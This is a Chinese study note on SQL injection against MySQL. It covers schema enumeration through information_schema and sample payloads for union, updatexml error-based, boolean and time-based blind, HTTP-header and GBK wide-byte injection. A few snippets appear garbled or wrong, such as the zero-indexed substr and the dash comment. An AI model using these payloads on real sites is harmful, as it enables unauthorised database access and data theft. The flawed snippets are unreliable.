sql注入实战笔记
sql注入基础
在数据库中有 information_schema 储存着数据库信息 我们可以从中查询任意字段所在的库表列
查库select schema_name from information_schema.schemata
查表select table_name from information_schema.tables where table_schema=''
查列 select column_name from information_schema.columns where table_name=''
查字段 select 列名,列名from 库名.表名
limit a,b (a表示从a+1个数据库开始,b表示从查多少个)
查询各种权限的用户: select user()
select system_user()
select current_user()
查询当前数据库名称: select database()
查询数据库版本: select version()
查询数据库路径:select @@datadir
查询操作系统:select @@version_compile_os
注入点测试
sql注入根据参数所传类型大致可以分为两类 字符型注入和数字型注入
数字型注入
sql语句大致为 select * from <表名> where id = x
可以用 and 1=1 和 and 1=2 来判断是否存在注入点
字符型注入
sql语句大致为 select * from <表名> where id = 'x'
我们可以用 1'
和 1'—— qwe
来判断是否存在注入点
或者 1’ and ‘1’=‘1 和 1’ and ‘1’='2 来判断是否存在注入点
union 回显注入
测试当前表中存在几列 order by 3
测试回显位置 union select 1,2,3
在回显位置 查询 union select 1,2,database()
报错注入
updatexml
UPDATEXML (XML_document, XPath_string, new_value);
参数1:xml 文档独享
参数2:路径(Xpath语法)
参数3:替换查找到的符合条件的数据
注入原理:通过符号字符构造不符合XPath语法的路径引发报错,从而使得sql语句执行并在报错信息中回显
例如 updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
布尔注入
注入原理:通过有无回显信息猜解字符串
所用函数
length() 反回字符串长度 例如猜解数据库长度 length(database()) =12
substr(string,start,length) 截取字符串 例如猜解字符串长度 substr(database(),0,1)=‘a’
left(a,b)截取字符串 例如 left(a,b)从左侧截取 a的前b位
regexp 正则匹配函数 例如 select user regexp ‘r’ user 的结果假设是root regexp匹配root的正则
like 正则匹配函数 select user() like ‘roo%’ 也是匹配但是必须从第一个字符开始
ascii()/ord() 将字符转换成ascii值
时间盲注
sleep() 等待几秒 例如 sleep(10)等待十秒
结合布尔盲注的函数 只是换了一种猜解方式
head头注入
任何与数据库交互的地方都可能存在sql注入漏洞
有时候网站会在数据库中保存我们的ip以及User-Agent 信息 如果通过http数据报头形式储存
那么可以构造http报头的字段进行sql注入
采用updatexml 函数
构造如下形式
666' or updatexml (1,concat (0x7e,database()),0) or '
宽字节注入
前提:sql注入所需要的特殊符号’‘或’ 被转义且mysql中采用的是gbk编码
注入原理:利用了gbk编码的特性
即0x00-0x7F范围内是单字节第一位,和 ASCII 保持一致。双字节的第一字节范围是0x81-0xFE
例如
输入 0xbf27
转义加上了0xbf5c27
在mysql解析中变成 0xbf5c 和0x27 从而吃掉了\逃逸出来’